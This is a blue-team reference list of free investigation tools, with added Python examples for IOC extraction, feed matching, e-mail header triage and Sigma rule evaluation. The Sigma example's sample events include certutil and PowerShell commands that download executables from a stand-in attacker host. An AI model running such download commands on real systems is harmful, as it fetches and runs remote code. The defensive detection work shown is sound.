This is a list of free online tools that Blue team analysts can use to investigate, analyze and collect information for different types of alerts.

- Document referencing
- Download Malware Samples
- Encoder/Decoder
- Framework
- IOC Feeds
- LOLBAS Projects
- Malware Analysis
- Network
- Phishing
- Reconnaissance
- Sigma
- Social Media
- Threat Intelligence
- Threat Matrix
- URL/IP/Domain analysis
- Vulnerabilities
- Windows built-in features usable for offensive purposes

## Document referencing

| Link | Description |
|---|---|
| Shodan Search modifiers | There are a set of special terms that you can use to refine your search results. |
| VirusTotal Search modifiers | There are a set of special terms that you can use to refine your search results. |

## Download Malware Samples

| Link | Description |
|---|---|
| AnyRun | Interactive online sandbox. Also fetches samples from a URL for analysis. Use the corporate account. |
| Cape | CAPE, Context Information Security's fork of the Cuckoo sandbox. Also fetches samples from a URL for analysis. |
| Hybrid-Analysis | CrowdStrike's public sandbox. Also fetches samples from a URL for analysis. Free account required to download samples. |
| MalShare | The MalShare Project is a collaborative effort to create a community driven public malware repository that works to build additional tools to benefit the security community at large. |
| MalwareBazaar Database | MalwareBazaar is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers. |
| Polyswarm | Crowdsourced Malware Analysis for new and emerging threats. Free and premium services. |
| Triage | Hatching Triage is a cross-platform malware analysis sandbox (Windows, Android, Linux and macOS) built for high-volume analysis and configuration extraction for dozens of malware families. Free account required. |
| VX-underground | A free Malware repository providing researchers access to samples. |
| VirusBay | VirusBay is a web-based, collaboration platform that connects security operations center (SOC) professionals with relevant malware researchers. |
| VirusShare | A free Malware repository providing researchers access to samples. |

## Encoder/Decoder

| Link | Description |
|---|---|
| CyberChef | GCHQ's free, browser-based tool to convert, parse, encode/decode and carry out well over 100 different operations (Base64, XOR, hashing, defang/refang, regex extraction and more) on arbitrary data. |
| Uncoder | SOC Prime's online translator for SIEM saved searches, filters, queries, API requests, correlation rules and Sigma rules, aimed at SOC analysts, threat hunters and SIEM engineers. |
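Most of the tools on this page expect live indicators, while tickets and reports carry defanged ones (hxxp, `[.]`, `[at]`). The following is an added example, not code from CyberChef or any listed tool, showing the refang/defang round trip and a first-pass IOC extractor; `SAMPLE_TEXT`, its defanging conventions and the `.test`/`.example` hostnames are constructed.

```python
"""Defang/refang indicators and pull IOCs out of free text.

Added example (not code from CyberChef or any tool listed above).
SAMPLE_TEXT and the defanging conventions it uses (hxxp, [.], [at])
are constructed sample data; hostnames use reserved .test/.example names.
"""
import re
from urllib.parse import urlsplit

# Constructed analyst note mixing live and already-defanged indicators.
SAMPLE_TEXT = (
    "Callback to http://evil-example.test/payload.bin from 192.168.10.5,\n"
    "secondary hxxps://update[.]bad-example[.]test/x and 10[.]0[.]0[.]7.\n"
    "Contact: analyst[at]soc.example"
)

# Defanged forms commonly seen in reports and tickets.
_DEFANGED_DOT = re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", re.IGNORECASE)
_DEFANGED_SCHEME = re.compile(r"\bhxxp(s?)(?=://)", re.IGNORECASE)
_DEFANGED_AT = re.compile(r"\[@\]|\[at\]", re.IGNORECASE)

# Live indicator shapes. _DOMAIN is deliberately loose; it only runs on text
# from which URLs and e-mail addresses have already been removed.
_URL = re.compile(r"\bhttps?://[^\s\"'<>]+", re.IGNORECASE)
_EMAIL = re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def refang(text: str) -> str:
    """Turn hxxp://, [.] and [at] back into live indicators."""
    text = _DEFANGED_DOT.sub(".", text)
    text = _DEFANGED_SCHEME.sub(lambda m: "http" + m.group(1), text)
    return _DEFANGED_AT.sub("@", text)


def defang(text: str) -> str:
    """Make every URL, e-mail, IPv4 and bare domain in the text safe to paste or mail."""
    live = refang(text)  # normalise first so mixed input is defanged consistently
    live = _URL.sub(lambda m: re.sub(r"^http", "hxxp", m.group(0), flags=re.IGNORECASE).replace(".", "[.]"), live)
    live = _EMAIL.sub(lambda m: m.group(0).replace("@", "[at]").replace(".", "[.]"), live)
    live = _IPV4.sub(lambda m: m.group(0).replace(".", "[.]"), live)
    return _DOMAIN.sub(lambda m: m.group(0).replace(".", "[.]"), live)


def _valid_ipv4(ip: str) -> bool:
    return all(0 <= int(octet) <= 255 for octet in ip.split("."))


def extract_iocs(text: str) -> dict:
    """Return the live (refanged) URLs, IPv4s, domains and e-mails found in text."""
    live = refang(text)
    urls = set(_URL.findall(live))
    emails = {e.lower() for e in _EMAIL.findall(live)}
    # Strip URLs and addresses before the loose domain/IP scan, otherwise path
    # pieces such as "payload.bin" would be reported as domains.
    residue = _EMAIL.sub(" ", _URL.sub(" ", live))
    ipv4 = {ip for ip in _IPV4.findall(residue) if _valid_ipv4(ip)}
    domains = {d.lower() for d in _DOMAIN.findall(residue)}
    domains |= {urlsplit(u).hostname for u in urls if urlsplit(u).hostname}
    domains |= {e.rpartition("@")[2] for e in emails}
    return {"urls": urls, "ipv4": ipv4, "domains": domains, "emails": emails}


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_TEXT).items():
        print(kind, sorted(values))
    print(defang(SAMPLE_TEXT))
```

Refang before you search and defang before you share: the extractor runs on the refanged text so a half-defanged ticket still yields clean lookups, and `defang()` re-normalises first so mixed input comes out consistent. The domain regex is intentionally permissive and will also pick up ordinary dotted words in prose, so treat bare-domain hits as candidates to verify in the URL/IP/Domain tools below rather than as confirmed IOCs.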

## Framework

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| DISARM Red Framework | The DISARM Red Framework provides a common language for documenting influence operations. When different organisations describe what they're seeing in the same terms, they can share intelligence, and gain a better understanding of actors' manipulative behaviours. | No | 2025-02-20 |
| MITRE ATT&CK Enterprise Matrix | The tactics and techniques representing the MITRE ATT&CK® Matrix for Enterprise. | No | 2025-01-16 |
| MITRE Attack Flow | Attack Flow, from the MITRE Center for Threat-Informed Defense, is a language for describing how adversaries combine and sequence ATT&CK techniques, so that the whole attack chain can be captured and communicated rather than isolated techniques. | No | 2025-08-15 |
| MITRE Attack Flow Builder | Interactive, browser-based editor for building Attack Flow diagrams. | No | 2025-08-15 |
| MITRE ATT&CK Navigator | Interactive interface to the MITRE ATT&CK framework that can be used as a graphical reference for understanding or following an investigation. | No | 2025-01-16 |
| MITRE CAPEC | CAPEC™ provides a comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. | No | 2025-01-16 |
| MITRE CREF Navigator | The CREF Navigator™ was developed as a web-based relational tool distilling the complex concepts and relationships from NIST SP 800-160 Volume 2 (Rev 1) into useful cyber resiliency terms, tables, and relationship visualizations enabling architectural and engineering analysis. | No | 2025-01-16 |
| MITRE CVE | The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. | No | 2025-01-16 |
| MITRE CWE | Common Weakness Enumeration (CWE™) is a community-developed list of common software and hardware weaknesses. A "weakness" is a condition in a software, firmware, hardware, or service component that, under certain circumstances, could contribute to the introduction of vulnerabilities. | No | 2025-01-16 |
| MITRE D3FEND | A knowledge base, structured as a knowledge graph, of defensive cybersecurity countermeasure techniques and their relationships to the offensive techniques in ATT&CK. | No | 2025-01-16 |
| MITRE EMB3D | The EMB3D Threat Model provides a cultivated knowledge base of cyber threats to embedded devices, providing a common understanding of these threats with security mechanisms to mitigate them. | No | 2025-01-16 |
| OWASP BLADE | The OWASP Business Logic Attack Definition (BLADE) Framework is an open-source knowledge base created to help cybersecurity professionals identify the phases, tactics and techniques used by adversaries to exploit weaknesses in the business logic of web-facing systems (websites and APIs). | No | 2025-08-25 |

## IOC Feeds

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| C2IntelFeeds | Free and open-source threat intelligence feeds dedicated to Cobalt Strike, Empire and PoshC2 command-and-control servers. | No | 2025-08-14 |
| Covert Threat Intelligence Feed list | Free and open-source threat intelligence feeds. | No | 2025-01-16 |
| FireHOL IPList | Analyses all available security IP feeds, mainly related to online attacks, online service abuse, malware, botnets, command-and-control servers and other cybercrime activity. | No | 2025-01-16 |
| Threat Feeds | Free and open-source threat intelligence feeds. | Yes | 2025-01-16 |
| Threat-intel.xyz | Free and Open Source Threat Intelligence Feeds. | No | 2025-01-16 |
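Feeds like the ones above are only useful once they are matched against your own logs. The following is an added example, not code from FireHOL or any listed feed: it parses a file in the line-oriented ipset/netset shape FireHOL uses (one IP or CIDR per line, `#` comments), collapses the ranges, and flags firewall log lines whose source IP falls inside a listed network. `SAMPLE_NETSET` and `SAMPLE_LOGS` are constructed from documentation ranges, and the `src=IP` log format is an assumption.

```python
"""Match log source IPs against a FireHOL-style .netset feed.

Added example; not code from FireHOL or any feed listed above. The feed
excerpt and log lines are constructed sample data. The feed is in the
line-oriented shape FireHOL publishes (one IP or CIDR per line, '#'
comments); the 'src=IP' log format is an assumption for the example.
"""
import ipaddress
import re

# Constructed feed excerpt using RFC 5737 documentation ranges, not real
# blocklist entries.
SAMPLE_NETSET = """\
#
# constructed_feed.netset
# Category: attacks
#
198.51.100.0/24
203.0.113.42
192.0.2.128/25   # inline comments are also allowed
"""

# Constructed firewall log lines (assumed format: "... src=IP dst=IP action=...").
SAMPLE_LOGS = [
    "2025-01-16T10:00:01Z src=203.0.113.42 dst=10.0.0.5 action=accept",
    "2025-01-16T10:00:02Z src=198.51.100.77 dst=10.0.0.5 action=accept",
    "2025-01-16T10:00:03Z src=192.0.2.5 dst=10.0.0.9 action=accept",
    "2025-01-16T10:00:04Z src=192.0.2.200 dst=10.0.0.9 action=deny",
    "2025-01-16T10:00:05Z src=not-an-ip dst=10.0.0.9 action=deny",
]

_SRC = re.compile(r"\bsrc=(\S+)")


def load_netset(text):
    """Parse an ipset/netset feed into a collapsed list of ip_network objects.

    Blank lines and '#' comments are skipped; a bare IP becomes a /32 (or /128).
    collapse_addresses merges overlapping and adjacent entries, so the number
    of lookups per IP is bounded by the number of distinct ranges, not lines.
    """
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    # collapse_addresses requires a single address family per call.
    v4 = [n for n in nets if n.version == 4]
    v6 = [n for n in nets if n.version == 6]
    return list(ipaddress.collapse_addresses(v4)) + list(ipaddress.collapse_addresses(v6))


def feed_hit(ip_text, feed):
    """Return the first feed network containing ip_text, or None.

    Unparseable input (truncated or garbled log fields) is reported as a miss
    rather than raising, so one bad line does not abort a batch run.
    """
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return None
    for net in feed:
        if ip.version == net.version and ip in net:
            return net
    return None


def scan_logs(lines, feed):
    """Return (line, matched_network) for every line whose src= IP is in the feed."""
    hits = []
    for line in lines:
        m = _SRC.search(line)
        if not m:
            continue
        net = feed_hit(m.group(1), feed)
        if net is not None:
            hits.append((line, str(net)))
    return hits


if __name__ == "__main__":
    feed = load_netset(SAMPLE_NETSET)
    for line, net in scan_logs(SAMPLE_LOGS, feed):
        print(net, "<-", line)
```

The linear scan in `feed_hit` is fine for a few thousand ranges; for the full FireHOL aggregate or for per-packet matching, load the collapsed networks into a radix tree or a kernel ipset instead. Keep the feed's own comment header when you store it: it records the source and category, which you will need when triaging a hit.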

## LOLBAS Projects

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| GTFOBins | Curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. | No | 2025-09-02 |
| LOLBAS (Living Off The Land Binaries and Scripts) | Document every binary, script, and library that can be used for Living Off The Land techniques. | No | 2025-09-02 |
| LOLDrivers | Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. | No | 2025-09-02 |
| LOLESXi | LOLESXi features a comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilised in their operations. | No | 2025-09-02 |
| LOLRMM | LOLRMM is a curated list of Remote Monitoring and Management (RMM) tools that could potentially be abused by threat actors. | No | 2025-09-02 |
| LOLOL | A great collection of resources to thrive off the land | No | 2025-09-02 |

## Malware Analysis

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| AnyRun | Interactive online sandbox. Also fetches samples from a URL for analysis. | Yes | 2025-01-16 |
| GateWatcher | Gatewatcher Intelligence is a non-commercial community project aimed at security professionals and enthusiasts; its intelligence list can be used for free by anyone. | No | 2025-01-16 |
| Hybrid-Analysis | CrowdStrike's public sandbox. Also fetches samples from a URL for analysis. Free account required to download samples. | No | 2025-01-16 |
| IRIS-H Digital Forensics | IRIS-H is an online digital forensics tool that performs automated static analysis of files stored in directory-based or strictly structured formats. The tool produces two types of data views allowing for thorough digital forensics examination. Supports Microsoft Office documents, .lnk and RTF files. | No | 2025-01-16 |
| InQuest Labs | Capable of recursively decompressing, decoding, deobfuscating, decompiling and deciphering files; aims to automate and scale the reverse-engineering skill set of a typical SOC analyst. | No | 2025-01-16 |
| Intezer Analyze Community Edition | Intezer's malware analysis and classification service, based on mapping code reuse ("code DNA") against known malware families. | Yes | 2025-01-16 |
| Joe Sandbox Cloud Community Edition | Joe Security's sandbox for Windows, Android, macOS and iOS that analyzes submitted files for suspicious activity. Also fetches samples from a URL for analysis. | No | 2025-01-16 |
| MalwareConfig | Extract config information from RATs. | No | 2025-01-16 |
| Manalyzer | Manalyzer is a free service which performs static analysis on PE executables to detect undesirable behavior. | No | 2025-01-16 |
| OPSWAT MetaDefender | OPSWAT's multi-engine scanning service: checks files, hashes, IPs, URLs and domains against many anti-malware engines and reputation sources. | No | 2025-01-16 |
| Pikker | Free public instance of Cuckoo sandbox | No | 2025-01-16 |
| Polyswarm | Crowdsourced Malware Analysis for new and emerging threats. | No | 2025-01-16 |
| Quicksand.io | Office document malware analysis. | No | 2025-01-16 |
| Sandblast | Check Point's public version of Threat Emulation. | Yes | 2025-01-16 |
| SecondWrite | Dynamic-analysis malware detector that combines deep learning with forced code execution to find, execute and characterize hidden code paths that other detectors miss. | Yes | 2025-01-16 |
| Talos File Reputation | The Cisco Talos Intelligence Group maintains a reputation disposition on billions of files. This reputation system feeds the AMP, Firepower, ClamAV and open-source Snort product lines. | No | 2025-01-16 |
| Triage | Hatching Triage is a cross-platform malware analysis sandbox (Windows, Android, Linux and macOS) built for high-volume analysis and configuration extraction for dozens of malware families. | Yes | 2025-01-16 |
| Valkyrie Comodo | File verdict system. Unlike traditional signature-based malware detection, Valkyrie runs several analyses using run-time behaviour and hundreds of features extracted from a file, and can warn users about malware undetected by classic anti-virus products. | No | 2025-01-16 |
| VirusTotal | Google's public platform that aggregates scan results for a sample from multiple AV vendors and provides basic threat intelligence and metadata about it. Note that most vendor verdicts are signature-based, so a clean result is not proof that a file is benign. | No | 2025-01-16 |

## Network

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| PacketTotal | Simple, free, high-quality PCAP analysis. | No | 2025-02-07 |
| UserAgentString | Lists over 100 user agent strings and provides a tool that automatically explains the information found in a given User-Agent string. | No | 2025-02-07 |

## Phishing

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| CheckPhish | Free Scanner to detect phishing & fraudulent sites in real-time. | No | 2025-01-16 |
| Code Beautify | HTML viewer. | No | 2025-01-16 |
| DNSTwister | The anti-phishing domain name search engine. | No | 2025-01-16 |
| Google G Suite Toolbox | Email header parser (Google Admin Toolbox Messageheader). | No | 2025-01-16 |
| Is it Phishing | Heuristic and machine-learning based URL checker that is effective against short, fast-moving phishing waves using shortened or dynamic links. | No | 2025-01-16 |
| MXToolBox | Email header parser. | No | 2025-01-16 |
| Microsoft Email headers Analyzer | Email header parser (Microsoft Message Header Analyzer). | No | 2025-01-16 |
| Phish report | Automatically analyses phishing sites and identifies the best ways you can report it to speed up the takedown process. | No | 2025-01-16 |
| Phishcheck | Find out what's lurking behind that URL. | No | 2025-01-16 |
| PhisHunt | Up-to-date feed of active phishing and scam sites, along with details and quick updates to help you understand this threat. | No | 2025-09-10 |
| Phishtank | PhishTank is a collaborative clearing house for data and information about phishing on the Internet. | No | 2025-01-16 |
| UnPHP | Free service for analyzing obfuscated and malicious PHP code. | No | 2025-01-16 |
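The header parsers above do three things an analyst can also do offline: walk the `Received` chain back to the originating host, read the `Authentication-Results` verdicts (SPF, DKIM, DMARC), and compare the envelope sender (`Return-Path`) with the header `From`. The following is an added example, not code from any listed tool, that does exactly that with the standard library; `SAMPLE_RAW` is a constructed message using reserved `.test`/`.example` names and RFC 5737 addresses, and the alignment check is the relaxed, "same or subdomain" rule.

```python
"""Triage a suspicious e-mail from its headers, offline.

Added example (not code from MXToolBox, Google Admin Toolbox or Microsoft's
analyzer). SAMPLE_RAW is a constructed phishing message; its hostnames,
addresses and IDs are placeholders.
"""
import email
import re
from email.utils import parseaddr

SAMPLE_RAW = """\
Return-Path: <bounce@mail.attacker-example.test>
Received: from mx2.corp.example (mx2.corp.example [10.0.0.25])
    by mailbox.corp.example with ESMTP id abc123
    for <victim@corp.example>; Thu, 16 Jan 2025 10:02:11 +0000
Received: from mail.attacker-example.test (mail.attacker-example.test [203.0.113.9])
    by mx2.corp.example with ESMTPS id def456; Thu, 16 Jan 2025 10:02:10 +0000
Authentication-Results: mx2.corp.example;
    spf=pass smtp.mailfrom=mail.attacker-example.test;
    dkim=none;
    dmarc=fail header.from=bank-example.test
From: "Bank Security" <alerts@bank-example.test>
To: victim@corp.example
Subject: Urgent: verify your account
Message-ID: <1234@mail.attacker-example.test>

Please log in at hxxp://bank-example[.]test.verify-login.test/
"""

_WS = re.compile(r"\s+")
_RECEIVED = re.compile(
    r"from\s+(?P<helo>\S+)(?:\s+\((?P<paren>[^)]*)\))?.*?\bby\s+(?P<by>\S+)",
    re.IGNORECASE | re.DOTALL,
)
_IP = re.compile(r"\[(?P<ip>[0-9a-f.:]+)\]", re.IGNORECASE)
_AUTH = re.compile(r"^(?P<method>[\w-]+)=(?P<result>\w+)\s*(?P<props>.*)$")


def _domain(addr_header):
    """Domain part of the address in a From/Return-Path style header."""
    return parseaddr(addr_header or "")[1].rpartition("@")[2].lower()


def parse_received(values):
    """Each MTA prepends its Received header, so reverse to get delivery order.

    The claimed HELO name is whatever the sender said; the bracketed IP is what
    the receiving MTA actually saw, so that is the value to pivot on.
    """
    hops = []
    for raw in reversed(values):
        m = _RECEIVED.search(_WS.sub(" ", raw).strip())
        if not m:
            continue
        ipm = _IP.search(m.group("paren") or "")
        hops.append({"from": m.group("helo"), "ip": ipm.group("ip") if ipm else None, "by": m.group("by")})
    return hops


def parse_auth_results(value):
    """Map method -> (result, properties); the first ';' field is the authserv-id."""
    results = {}
    for part in _WS.sub(" ", value).split(";")[1:]:
        m = _AUTH.match(part.strip())
        if m:
            results[m.group("method").lower()] = (m.group("result").lower(), m.group("props"))
    return results


def analyze(raw):
    msg = email.message_from_string(raw)
    from_domain = _domain(msg.get("From"))
    return_path_domain = _domain(msg.get("Return-Path"))
    # Relaxed alignment as DMARC uses it: envelope domain must equal the header
    # From domain or be a subdomain of it.
    aligned = return_path_domain == from_domain or return_path_domain.endswith("." + from_domain)
    hops = parse_received(msg.get_all("Received", []))
    auth = {}
    for value in msg.get_all("Authentication-Results", []):
        auth.update(parse_auth_results(value))
    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "aligned": aligned,
        "auth": auth,
        "hops": hops,
        "origin_ip": hops[0]["ip"] if hops else None,
    }


def findings(report):
    """Human-readable reasons to escalate, in the order an analyst would check them."""
    out = []
    if not report["aligned"]:
        out.append("Return-Path domain does not align with header From domain")
    for method in ("spf", "dkim", "dmarc"):
        result = report["auth"].get(method, ("missing", ""))[0]
        if result != "pass":
            out.append(f"{method}={result}")
    return out


if __name__ == "__main__":
    report = analyze(SAMPLE_RAW)
    print("origin IP:", report["origin_ip"], "hops:", report["hops"])
    print("findings:", findings(report))
```

Two caveats that the online parsers also carry: only trust `Authentication-Results` headers stamped by your own boundary MTA (anything below it in the chain could have been forged by the sender), and the earliest `Received` hop is only as honest as the first MTA that wrote it, so pivot on the bracketed IP with the URL/IP/Domain tools below rather than on the HELO name.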

## Reconnaissance

| Link | Description |
|---|---|
| BuiltWith | Website profiler, lead generation, competitive analysis and business intelligence tool providing technology adoption, ecommerce data and usage analytics for the internet. |
| Paste Site Search | Search 90+ paste sites. Filter by source & keyword. |

## Sigma

| Link | Description |
|---|---|
| Detection.FYI | Searchable web index of Sigma detection rules. |
| Sigma HQ | Home of the Sigma project: the generic, vendor-agnostic YAML signature format for log-based detections, its specification and the main community rule repository. |
| Sigma Search Engine | Search engine for public Sigma rules. |
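Reading a Sigma rule from the repositories above is easier once you have seen how its `detection` block is evaluated. The following is an added example, not code from SigmaHQ, Detection.FYI or any listed project: a minimal evaluator for the subset of Sigma semantics most rules use (fields within a selection are ANDed, a list of values is ORed, the `contains`/`startswith`/`endswith`/`all` modifiers, and a condition built from `and`/`or`/`not`), run over constructed process-creation events. `RULE` is written in Sigma's structure but is a constructed rule modelled on the LOLBAS-style "certutil used as a downloader" pattern from the LOLBAS section above, and the `filter_internal` allow-list host is an assumed internal name.

```python
"""Evaluate a Sigma-style detection against process-creation events.

Added example (not code from SigmaHQ, Detection.FYI or any listed project).
RULE and SAMPLE_EVENTS are constructed; the allow-listed host in
filter_internal is an assumption for the example, not part of any real rule.
"""
import ast

RULE = {
    "title": "Certutil download via urlcache (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        # Assumed allow-list: an internal update host, not part of any real rule.
        "filter_internal": {"CommandLine|contains": "internal-update.example"},
        "condition": "selection and not filter_internal",
    },
}

SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://evil-example.test/a.exe a.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://internal-update.example/p.msi p.msi"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile report.pdf SHA256"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c certutil -urlcache -f http://evil-example.test/b.exe"},
]


def _match_value(actual, expected, modifiers):
    """Sigma string matching is case-insensitive; modifiers choose the comparison."""
    if actual is None:
        return False
    hay, needle = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return needle in hay
    if "startswith" in modifiers:
        return hay.startswith(needle)
    if "endswith" in modifiers:
        return hay.endswith(needle)
    return hay == needle


def _match_selection(selection, event):
    """Every field in a selection must match; a list of values is OR unless |all."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        values = expected if isinstance(expected, list) else [expected]
        results = [_match_value(event.get(field), v, modifiers) for v in values]
        if not (all(results) if "all" in modifiers else any(results)):
            return False
    return True


def _eval_condition(node, truth):
    """Walk the parsed condition, allowing only names, and, or, not."""
    if isinstance(node, ast.Expression):
        return _eval_condition(node.body, truth)
    if isinstance(node, ast.Name):
        return truth[node.id]
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
        return not _eval_condition(node.operand, truth)
    if isinstance(node, ast.BoolOp):
        combine = all if isinstance(node.op, ast.And) else any
        return combine(_eval_condition(v, truth) for v in node.values)
    raise ValueError("unsupported condition syntax: " + ast.dump(node))


def rule_matches(rule, event):
    detection = rule["detection"]
    truth = {name: _match_selection(sel, event)
             for name, sel in detection.items() if name != "condition"}
    # A plain and/or/not Sigma condition parses as a Python boolean expression;
    # ast.parse plus the restricted walker above evaluates it without eval().
    return _eval_condition(ast.parse(detection["condition"], mode="eval"), truth)


def matching_events(rule, events):
    return [e for e in events if rule_matches(rule, e)]


if __name__ == "__main__":
    for hit in matching_events(RULE, SAMPLE_EVENTS):
        print("ALERT:", RULE["title"], "->", hit["CommandLine"])
```

Events 2 to 4 show why each piece of the rule is there: the allow-listed host is suppressed by `filter_internal`, a legitimate `certutil -hashfile` never satisfies the `|contains|all` pair, and the same command line launched from `powershell.exe` fails the `Image|endswith` check (a reminder that a rule keyed on `Image` misses the technique when it is proxied through another binary). The evaluator deliberately does not implement `1 of selection*`, `all of them`, aggregation, regex or `|windash` modifiers, which is what a converter such as Uncoder or sigma-cli handles for a real SIEM.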

## Social Media

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| BeenVerified | Gives access to U.S. public records that were formerly only available to big companies and people with deep pockets, in a way that is easy, affordable and fast. U.S. only. | | |
| Checkusernames | Check the use of your brand or username on 160 social networks. | | |
| Instagram Explorer | Find images on Instagram by date at particular locations. This tool makes searching easier and more efficient. | No | 2025-02-07 |
| Knowem | Check for the use of your brand, product, personal name or username instantly on over 500 popular and emerging social media websites. | | |
| Namechk | Free username and domain search tool that checks a desired username across hundreds of social networks and domain extensions at once. | | |
| Reddit Post Analyzer | Use this OSINT tool to analyze Reddit posts. Enter the post URL to get a downloadable file which outlines comment metadata like time, timezone and username, plus sentiment ranking. | No | 2025-02-07 |
| Social Geo Lens | Conduct geo-searching on social media platforms. The map-based interface makes it easy to use and the design means you remain compliant with relevant terms of service. | No | 2025-02-07 |
| TikTok Quick Search | Search usernames and hashtags on TikTok via a browser. All results take the user to the source on the TikTok.com website or are provided as a Google search result. | No | 2025-02-07 |
| Whatsmyname | Use this OSINT tool to find usernames across many websites. | No | 2025-02-07 |

## Threat Intelligence

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| CERT.PL | | Yes | 2025-01-16 |
| CTI Chef | A tool for cyber threat intelligence (CTI) analysis, used to collect, analyze and disseminate intelligence on cyber threats. | No | 2025-05-27 |
| Group-IB Malware Detonation Reports | Group-IB's Malware Detonation Platform goes beyond identifying good and bad files: it reveals how an attack unfolds in real time, pinpointing which processes are executed, which files are created or modified, and what network connections are established. | No | 2025-12-23 |
| IBM X-Force Exchange | Threat Intelligence sharing platform enabling research on security threats, aggregation of intelligence and collaboration with peers. | No | 2025-01-16 |
| Intelligence X | Intelligence X is a search engine and data archive. | No | 2025-01-16 |
| LevelBlue | LevelBlue Open Threat Exchange (OTX), formerly AT&T Alien Labs OTX: an open threat intelligence community where members share "pulses" of indicators of compromise. | Yes | 2025-01-16 |
| Malpedia | Provide a resource for rapid identification and actionable context when investigating malware. | No | 2025-01-16 |
| Maltiverse | Analyzes all the possible dimensions and points of view of known and classified IOC's to compare them with the unknown indicators for matching. | No | 2025-01-16 |
| PulseDive | An analyst-centric threat intelligence platform that can provide users with comprehensive community threat intelligence to help identify known threats. | No | 2025-01-16 |
| Lighthouse feed finder | Search for a RSS Feed for a domain. | No | 2025-12-23 |
| ThreatConnect | Threat Intelligence Platform for companies to aggregate and act upon threat intelligence. | Yes | 2025-01-16 |

## Threat Matrix

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| Cloud Security Alliance Cloud Controls Matrix (CCM) | The Cloud Controls Matrix (CCM) is a cybersecurity control framework that maps to industry best practices and is considered the standard for cloud security and privacy. | Yes | 2025-01-16 |
| Confiant Malvertising Attack Matrix | Detailing threat actors through malvertising activity. | No | 2025-01-16 |
| ITM Insider Threat Matrix | ITM is a continually growing framework for digital investigators investigating instances of computer-enabled insider threats in organizations of any size. | No | 2025-01-16 |
| MITRE ATLAS (AI) | Knowledge base of adversary tactics and techniques against AI systems, drawn from real-world attack observations and demonstrations. | No | 2025-01-16 |
| MITRE Cloud Matrix | The tactics and techniques representing the MITRE ATT&CK® cloud platforms. | No | 2025-01-16 |
| Microsoft DevOps Threat Matrix | Microsoft's knowledge base of attack techniques relevant to DevOps environments, built so that defenders can keep track of and build defenses against them. | No | 2025-01-16 |
| Microsoft Threat Matrix for Kubernetes | Microsoft's ATT&CK-style matrix of tactics and techniques used against Kubernetes clusters. | No | 2025-01-16 |
| Microsoft Threat Matrix for Storage Services | The purpose of the threat matrix for storage services is to conceptualize the known tactics, techniques and procedures (TTPs) that adversaries may use against cloud storage accounts. | No | 2025-01-16 |
| OWASP Threat and Safeguard Matrix (TaSM) | The Threat and Safeguard Matrix (TaSM) is an action-oriented view to safeguard and enable the business created by CISO Tradecraft. | No | 2025-01-16 |
| Space Attack Research and Tactic Analysis (SPARTA) matrix | SPARTA is intended to provide unclassified information to space professionals about how spacecraft may be compromised via cyber and traditional counterspace means. | No | 2025-01-16 |

## URL/IP/Domain analysis

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| AbuseIPDB | Provide a central blacklist for webmasters, system administrators, and other interested parties to report and find IP addresses that have been associated with malicious activity online. | No | 2025-01-16 |
| BinaryEdge | Scan the entire public internet, create real-time threat intelligence streams, and reports that show the exposure of what is connected to the Internet. | Yes | 2025-01-16 |
| Censys | Uses Internet scan data to give organizations the visibility they need to defend against attacks and improve their overall security hygiene. | Yes | 2025-01-16 |
| Cisco Talos | Talos IP and Domain Reputation Center: look up the reputation and categorization Cisco assigns to an IP address or domain, backed by Talos's real-time threat detection network. | No | 2025-01-16 |
| DNSDumpster | Domain research tool that can discover hosts related to a domain. | No | 2025-01-16 |
| DNSlytics | Find out everything about a domain name, IP address or provider. | No | 2025-01-16 |
| SecurityTrails | World's largest repository of historical DNS data. | No | 2025-01-16 |
| Google Safe Browsing | Check site status in Google Safe Browsing database. | No | 2025-01-16 |
| HackerTarget | Domain research tool that can discover hosts related to a domain. | No | 2025-01-16 |
| IPVoid | IP address tools to discover details about IP addresses. | No | 2025-01-16 |
| Ipinfo.io | IP address data (geolocation, ASN and ownership details) for a given IP. | No | 2025-01-16 |
| Lookyloo | Tool developed by CIRCL (the Luxembourg CERT) that helps to have a quick overview of a website by scraping it and displaying a tree of domains calling each other. | No | 2025-01-16 |
